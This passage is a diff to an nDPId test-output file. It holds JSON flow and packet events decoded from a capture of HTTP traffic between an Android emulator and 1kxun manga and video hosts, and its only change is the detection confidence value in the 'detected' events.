-00979{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2058,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385156978,"flow_last_seen":1654385156978,"flow_idle_time":7580000,"flow_min_l4_payload_len":1118,"flow_max_l4_payload_len":1118,"flow_tot_l4_payload_len":1118,"flow_avg_l4_payload_len":1118,"midstream":1,"thread_ts_msec":1654385156978,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":50164,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"mangaweb.1kxun.mobi","url":"mangaweb.1kxun.mobi\/images\/readpage_revision\/more_white.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} +00979{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2058,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385156978,"flow_last_seen":1654385156978,"flow_idle_time":7580000,"flow_min_l4_payload_len":1118,"flow_max_l4_payload_len":1118,"flow_tot_l4_payload_len":1118,"flow_avg_l4_payload_len":1118,"midstream":1,"thread_ts_msec":1654385156978,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":50164,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"mangaweb.1kxun.mobi","url":"mangaweb.1kxun.mobi\/images\/readpage_revision\/more_white.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2059,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385156997,"flow_last_seen":1654385156997,"flow_idle_time":7580000,"flow_min_l4_payload_len":1113,"flow_max_l4_payload_len":1113,"flow_tot_l4_payload_len":1113,"flow_avg_l4_payload_len":1113,"midstream":1,"thread_ts_msec":1654385156997,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":50166,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01957{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2059,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":1,"flow_last_seen":1654385156997,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1179,"pkt_l4_len":1145,"thread_ts_msec":1654385156997,"pkt":"tKXvZygQnLbQ0+MzCABFAASNFH5AAEAGsDTAqAJ+oXUNHcP2AFChqIPWvwX7zYAYAfZ2OAAAAQEICrrGVa6XEVcPR0VUIC9pbWFnZXMvcmVhZHBhZ2VfcmV2aXNpb24vcmlnaHQucG5nIEhUVFAvMS4xDQpIb3N0OiBtYW5nYXdlYi4xa3h1bi5tb2JpDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgMTE7IHNka19ncGhvbmVfeDg2IEJ1aWxkL1JTUjEuMjAxMDEzLjAwMTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS84My4wLjQxMDMuMTA2IE1vYmlsZSBTYWZhcmkvNTM3LjM2DQpBY2NlcHQ6IGltYWdlL3dlYnAsaW1hZ2UvYXBuZyxpbWFnZS8qLCovKjtxPTAuOA0KWC1SZXF1ZXN0ZWQtV2l0aDogY29tLnNjZW5ld2F5Lmthbmthbg0KUmVmZXJlcjogaHR0cDovL21hbmdhd2ViLjFreHVuLm1vYmkvDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjkNCkNvb2tpZTogX19xY193SWQ9NDcyOyBwZ3ZfcHZpZD0xNTc5MTk5MjgwOyBhY2Nlc3NfdG9rZW49bnVsbDsgX19nYWRzPUlEPWZjMGYyMmY3OGQ4MmZiNDQtMjJjNDllMTdhOGNkMDBjMTpUPTE2NTQzODUxNDM6UlQ9MTY1NDM4NTE0MzpTPUFMTklfTVlxQy1PUjQwVGFRTFBJdTd2aGtaLS1VMXRtLVE7IF9nYT1HQTEuMi42OTQ1MjQ1MjguMTY1NDM4NTE0MjsgX2dpZD1HQTEuMi4yMDQ5ODYxNjI3LjE2NTQzODUxNDM7IF9nYXQ9MTsgX2dhdF9ndGFnX1VBXzE1NDc1NzkyOV81Nz0xOyBfdHRfZW5hYmxlX2Nvb2tpZT0xOyBfdHRwPWU4NDYzOWI3LTk0MDAtNDA2Yy05N2UxLTAzZjhkYTQ4MTVmODsgaXNfc2F2ZV9jb29raWU9dXNJTXZIa3hQNEpEWGhjOyBfY3JlYXRlX2RhdGU9MjAyMi82LzQ7IG5vbl9uYXRpdmVfZG9tYWluPWh0dHBzOi8vYWtlbWFuZ2Eub3ItZnJuZC5jb207IF92ZXJzaW9uPXYyMDIwMDUwNTsgX2dlbmVyYWxfc3Vic2NyaWJlPTI7IGNsb3Vkb3dsc191dWlkPTM1YmYzNmRmLTBiYWUtZTA5Mi1mMmIxLWI3MzlmNTZjM2VjZDsgY2xvdWRvd2xzX2lzX3N1YnNjcmliZT0xOyBzdWJzY3JpYmVfZ2VuZXJhbF90b2tlbj0zNWJmMzZkZi0wYmFlLWUwOTItZjJiMS1iNzM5ZjU2YzNlY2Q7IGxhc3RfdXJsPW51bGwNCg0K"} -00974{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2059,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385156997,"flow_last_seen":1654385156997,"flow_idle_time":7580000,"flow_min_l4_payload_len":1113,"flow_max_l4_payload_len":1113,"flow_tot_l4_payload_len":1113,"flow_avg_l4_payload_len":1113,"midstream":1,"thread_ts_msec":1654385156997,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":50166,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"mangaweb.1kxun.mobi","url":"mangaweb.1kxun.mobi\/images\/readpage_revision\/right.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} +00974{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2059,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385156997,"flow_last_seen":1654385156997,"flow_idle_time":7580000,"flow_min_l4_payload_len":1113,"flow_max_l4_payload_len":1113,"flow_tot_l4_payload_len":1113,"flow_avg_l4_payload_len":1113,"midstream":1,"thread_ts_msec":1654385156997,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":50166,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"mangaweb.1kxun.mobi","url":"mangaweb.1kxun.mobi\/images\/readpage_revision\/right.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2060,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385157001,"flow_last_seen":1654385157001,"flow_idle_time":7580000,"flow_min_l4_payload_len":1119,"flow_max_l4_payload_len":1119,"flow_tot_l4_payload_len":1119,"flow_avg_l4_payload_len":1119,"midstream":1,"thread_ts_msec":1654385157001,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":50176,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01965{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2060,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":1,"flow_last_seen":1654385157001,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1185,"pkt_l4_len":1151,"thread_ts_msec":1654385157001,"pkt":"tKXvZygQnLbQ0+MzCABFAASTjHtAAEAGODHAqAJ+oXUNHcQAAFCrgt7ji0XD5YAYAfZ2PgAAAQEICrrGVbOXEVcWR0VUIC9pbWFnZXMvbGlzdF9kZWZhdWx0LnBuZyBIVFRQLzEuMQ0KSG9zdDogbWFuZ2F3ZWIuMWt4dW4ubW9iaQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKExpbnV4OyBBbmRyb2lkIDExOyBzZGtfZ3Bob25lX3g4NiBCdWlsZC9SU1IxLjIwMTAxMy4wMDE7IHd2KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9uLzQuMCBDaHJvbWUvODMuMC40MTAzLjEwNiBNb2JpbGUgU2FmYXJpLzUzNy4zNg0KQWNjZXB0OiBpbWFnZS93ZWJwLGltYWdlL2FwbmcsaW1hZ2UvKiwqLyo7cT0wLjgNClgtUmVxdWVzdGVkLVdpdGg6IGNvbS5zY2VuZXdheS5rYW5rYW4NClJlZmVyZXI6IGh0dHA6Ly9tYW5nYXdlYi4xa3h1bi5tb2JpL2Nzcy9hcHAuY3NzPzE0OTA1DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjkNCkNvb2tpZTogX19xY193SWQ9NDcyOyBwZ3ZfcHZpZD0xNTc5MTk5MjgwOyBhY2Nlc3NfdG9rZW49bnVsbDsgX19nYWRzPUlEPWZjMGYyMmY3OGQ4MmZiNDQtMjJjNDllMTdhOGNkMDBjMTpUPTE2NTQzODUxNDM6UlQ9MTY1NDM4NTE0MzpTPUFMTklfTVlxQy1PUjQwVGFRTFBJdTd2aGtaLS1VMXRtLVE7IF9nYT1HQTEuMi42OTQ1MjQ1MjguMTY1NDM4NTE0MjsgX2dpZD1HQTEuMi4yMDQ5ODYxNjI3LjE2NTQzODUxNDM7IF9nYXQ9MTsgX2dhdF9ndGFnX1VBXzE1NDc1NzkyOV81Nz0xOyBfdHRfZW5hYmxlX2Nvb2tpZT0xOyBfdHRwPWU4NDYzOWI3LTk0MDAtNDA2Yy05N2UxLTAzZjhkYTQ4MTVmODsgaXNfc2F2ZV9jb29raWU9dXNJTXZIa3hQNEpEWGhjOyBfY3JlYXRlX2RhdGU9MjAyMi82LzQ7IG5vbl9uYXRpdmVfZG9tYWluPWh0dHBzOi8vYWtlbWFuZ2Eub3ItZnJuZC5jb207IF92ZXJzaW9uPXYyMDIwMDUwNTsgX2dlbmVyYWxfc3Vic2NyaWJlPTI7IGNsb3Vkb3dsc191dWlkPTM1YmYzNmRmLTBiYWUtZTA5Mi1mMmIxLWI3MzlmNTZjM2VjZDsgY2xvdWRvd2xzX2lzX3N1YnNjcmliZT0xOyBzdWJzY3JpYmVfZ2VuZXJhbF90b2tlbj0zNWJmMzZkZi0wYmFlLWUwOTItZjJiMS1iNzM5ZjU2YzNlY2Q7IGxhc3RfdXJsPW51bGwNCg0K"} -00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2060,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385157001,"flow_last_seen":1654385157001,"flow_idle_time":7580000,"flow_min_l4_payload_len":1119,"flow_max_l4_payload_len":1119,"flow_tot_l4_payload_len":1119,"flow_avg_l4_payload_len":1119,"midstream":1,"thread_ts_msec":1654385157001,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":50176,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"mangaweb.1kxun.mobi","url":"mangaweb.1kxun.mobi\/images\/list_default.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} +00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2060,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385157001,"flow_last_seen":1654385157001,"flow_idle_time":7580000,"flow_min_l4_payload_len":1119,"flow_max_l4_payload_len":1119,"flow_tot_l4_payload_len":1119,"flow_avg_l4_payload_len":1119,"midstream":1,"thread_ts_msec":1654385157001,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":50176,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"mangaweb.1kxun.mobi","url":"mangaweb.1kxun.mobi\/images\/list_default.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 01491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2061,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":164,"flow_packet_id":2,"flow_last_seen":1654385157145,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":748,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":748,"pkt_l4_len":714,"thread_ts_msec":1654385157145,"pkt":"nLbQ0+MztKXvZygQCABFAALe44NAADQG7t2hdQ0dwKgCfgBQw9yTFLQsi9xmdIAYAPSXNAAAAQEICpcRV7G6xlWMSFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG9wZW5yZXN0eS8xLjEzLjYuMQ0KRGF0ZTogU2F0LCAwNCBKdW4gMjAyMiAyMzoyNTo1NyBHTVQNCkNvbnRlbnQtVHlwZTogaW1hZ2UvcG5nDQpDb250ZW50LUxlbmd0aDogMzY2DQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpMYXN0LU1vZGlmaWVkOiBGcmksIDE2IE9jdCAyMDIwIDA3OjExOjEwIEdNVA0KRVRhZzogIjVmODk0NzhlLTE2ZSINCkV4cGlyZXM6IEZyaSwgMDIgU2VwIDIwMjIgMjM6MjU6NTcgR01UDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTc3NzYwMDANCkFjY2VwdC1SYW5nZXM6IGJ5dGVzDQoNColQTkcNChoKAAAADUlIRFIAAABaAAAAWggDAAAAD3axMAAAAFFQTFRFAAAA\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/CDfnXgAAABp0Uk5TAOEQHt3X0s4WI+fFBvPkMNPJq0tAC7VRUC7\/IHCDAAAAsklEQVRYw+3W6wqDMAwF4Fi13nX3y3n\/Bx1dmT\/mYBZSsHK+BziEkiYRIiIiIiLaC3M6Sxx9B1wkBlMBGO6iz3Rwil60XSs441O01T65aESbOcJpIySXvuZctOUHOKV+cm3hZBGSCziVEW2Nf2cboeYSb63N\/rASZhqxmoS5YbVhO1WHvPWGOuS7r1P5jYsZksjkW87rNLbMvBvbSbw0NvrnDnnILInryd98REREREQ\/vAAzzxwTVWsbZwAAAABJRU5ErkJggg=="} 01644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2063,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":165,"flow_packet_id":2,"flow_last_seen":1654385157153,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":832,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":832,"pkt_l4_len":798,"thread_ts_msec":1654385157153,"pkt":"nLbQ0+MztKXvZygQCABFAAMy+MlAADQG2UOhdQ0dwKgCfgBQw+Q76a9lejKjSIAYAPQgmwAAAQEICpcRV7e6xlWVSFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG9wZW5yZXN0eS8xLjEzLjYuMQ0KRGF0ZTogU2F0LCAwNCBKdW4gMjAyMiAyMzoyNTo1NyBHTVQNCkNvbnRlbnQtVHlwZTogaW1hZ2UvcG5nDQpDb250ZW50LUxlbmd0aDogNDUwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpMYXN0LU1vZGlmaWVkOiBGcmksIDE2IE9jdCAyMDIwIDA3OjExOjEwIEdNVA0KRVRhZzogIjVmODk0NzhlLTFjMiINCkV4cGlyZXM6IEZyaSwgMDIgU2VwIDIwMjIgMjM6MjU6NTcgR01UDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTc3NzYwMDANCkFjY2VwdC1SYW5nZXM6IGJ5dGVzDQoNColQTkcNChoKAAAADUlIRFIAAABaAAAAWggDAAAAD3axMAAAAG9QTFRFAAAA\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/L9MC0QAAACR0Uk5TAJSpvW0XB\/bWdRD8t6aZi3E3AvPs3s20r6B8d2dTI0U7LisEPmah4wAAAN5JREFUWMPt1MkOglAMheGi3AsOgDhP4NT3f0YhYiQGMcg9iYvzr7rpt2lSYYwxxhhj7C172I4F0nykCrFLuSiei\/sOWhYa9\/JIKxol69S5PNMqDyYHR8eyr89WKUrWtQXIiCv6kxqduJSPdXl5diinC60VDAevon2\/h5JoS+u8szd85BdjrG3tOtO1Ra+VDn6lva+0ksbT+DNucHQGo0MDo\/0bil7kgqITi6InqaDo6RhGZ4KiVwZGzwRFL68w2rN96f0n+iR9aRM2y5HtRUflfNk0ybERxhhjjLG\/7A7dOIR9fLd0dQAAAABJRU5ErkJggg=="} 01169{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2064,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":2,"flow_last_seen":1654385157162,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":574,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":574,"pkt_l4_len":540,"thread_ts_msec":1654385157162,"pkt":"nLbQ0+MztKXvZygQCABFAAIwUYBAADQGgY+hdQ0dwKgCfgBQw\/TiBgbELqLpRYAYAPSjggAAAQEICpcRV8K6xlWcSFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG9wZW5yZXN0eS8xLjEzLjYuMQ0KRGF0ZTogU2F0LCAwNCBKdW4gMjAyMiAyMzoyNTo1NyBHTVQNCkNvbnRlbnQtVHlwZTogaW1hZ2UvcG5nDQpDb250ZW50LUxlbmd0aDogMTkzDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpMYXN0LU1vZGlmaWVkOiBGcmksIDE2IE9jdCAyMDIwIDA3OjExOjEwIEdNVA0KRVRhZzogIjVmODk0NzhlLWMxIg0KRXhwaXJlczogRnJpLCAwMiBTZXAgMjAyMiAyMzoyNTo1NyBHTVQNCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9Nzc3NjAwMA0KQWNjZXB0LVJhbmdlczogYnl0ZXMNCg0KiVBORw0KGgoAAAANSUhEUgAAAFoAAABaBAMAAADKhlwxAAAAD1BMVEUAAAD\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/+PQt5oAAAABHRSTlMA8a0mzjE4JAAAAF1JREFUWMPt0LsNgDAMRVEgC\/DJACAYANgg6O0\/E0qKpLIipYt0T2PryYXtAQAA9OpdzlTdsd45sDivkKYeaSuBYZK0x+aSvhIYRklzbLwUctA+Xd+k\/cr6BwEAwA+l3hHvzEdfEgAAAABJRU5ErkJggg=="} @@ -880,13 +879,13 @@ 01158{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2067,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":3,"flow_last_seen":1654385157186,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":576,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":576,"pkt_l4_len":542,"thread_ts_msec":1654385157186,"pkt":"nLbQ0+MztKXvZygQCABFAAIylDBAADQGPt2hdQ0dwKgCfgBQxACLRcmFq4LjQoAYAPR6KwAAAQEICpcRV9e6xlWzbvw7aAawPVMELTo4l9oXUyfSQao9EpmlQWB5vUp\/AXEBPEbzzwdVge4S8GIhZQN4TwfTVYAOj1wA6cyB\/AAvtbeVgFhLWUwTS0XQFsGFyy7qYBt1tlGbWvABmbwipFtrVgTTGLMi2BgcyK9aM3XCtrmtBLhbJq97te4FdDBoKQdLL9f8ZB7spC4TvHsCCYuiaXLrGdS2iGYQ\/AcQlYFjM0VQqTHtATSJp5plTD+E7ze50uTcvixxhpfLtBrQPqoIEssCqj1KvSRWiJIwxiiEda6DYUahSQeDG8tASlFJiN+bNVCUiEV9uICY4EQ4h5I5DJ7jZRnYnGsqizDD7IlprHB925X7rpbEziY4Vo4oXbQ\/DaBJVtrR5p+TjREy1mMEfU\/uoVFxxuxPPj7eEsc9e5lVBY\/jEOySd5jZXgVkAMVDMWxbK3px1AD2nXrkNoKi8tGu9cyTVDDo97SGkRDWBswOa6+nFvoFCUAkCuGFIhI8bgOIgkFdMqigaT9hhN6njYcbGgjten1FYM6DqC4gRN0h1xVsDT+gpLt+IEwgw5Mu1hFsYpjkuuoITmKMbfLXDzQ\/wJtvtKD6gbDTPQjVE0Swtf\/N7744yEEOcpCDHOQgBznIQQ5ykIMc5CAHOchBDnKQgxzkYBH8DdDO1wSycMqNAAAAAElFTkSuQmCC"} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2083,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385176794,"flow_last_seen":1654385176794,"flow_idle_time":7580000,"flow_min_l4_payload_len":207,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":207,"midstream":1,"thread_ts_msec":1654385176794,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":38326,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00747{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2083,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":169,"flow_packet_id":1,"flow_last_seen":1654385176794,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":273,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":273,"pkt_l4_len":239,"thread_ts_msec":1654385176794,"pkt":"tKXvZygQnLbQ0+MzCABFAAED5\/JAAEAGaSDAqAJ+rGl5UpW2AFDAhIjRiFQ344AYAfbp1wAAAQEICvK1uV7Jom0fR0VUIC92aWRlb19rYW5rYW4vaW1hZ2VzL3ZpZGVvcy80MDczMC00OGZkNjU3YWJkNWExZDNlNDVkMDM0MDNkZGNiMDY2My5qcGcgSFRUUC8xLjENCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpIb3N0OiBwaWMuMWt4dW4uY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClVzZXItQWdlbnQ6IG9raHR0cC8zLjEwLjANCg0K"} -00837{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2083,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385176794,"flow_last_seen":1654385176794,"flow_idle_time":7580000,"flow_min_l4_payload_len":207,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":207,"midstream":1,"thread_ts_msec":1654385176794,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":38326,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/40730-48fd657abd5a1d3e45d03403ddcb0663.jpg","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} +00837{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2083,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385176794,"flow_last_seen":1654385176794,"flow_idle_time":7580000,"flow_min_l4_payload_len":207,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":207,"midstream":1,"thread_ts_msec":1654385176794,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":38326,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/40730-48fd657abd5a1d3e45d03403ddcb0663.jpg","code":0,"content_type":"","user_agent":"okhttp\/3.10.0"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2084,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385176794,"flow_last_seen":1654385176794,"flow_idle_time":7580000,"flow_min_l4_payload_len":207,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":207,"midstream":1,"thread_ts_msec":1654385176794,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":38314,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00746{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2084,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":1,"flow_last_seen":1654385176794,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":273,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":273,"pkt_l4_len":239,"thread_ts_msec":1654385176794,"pkt":"tKXvZygQnLbQ0+MzCABFAAEDhyVAAEAGye3AqAJ+rGl5UpWqAFDm5trb+jit4YAYAfbp1wAAAQEICvK1uV7Jom0dR0VUIC92aWRlb19rYW5rYW4vaW1hZ2VzL3ZpZGVvcy80MDc1MC01ODU2NDUzNTNhN2E0NzYxNTc1NWI3NzE0YzYxMTgzNS5qcGcgSFRUUC8xLjENCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpIb3N0OiBwaWMuMWt4dW4uY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClVzZXItQWdlbnQ6IG9raHR0cC8zLjEwLjANCg0K"} 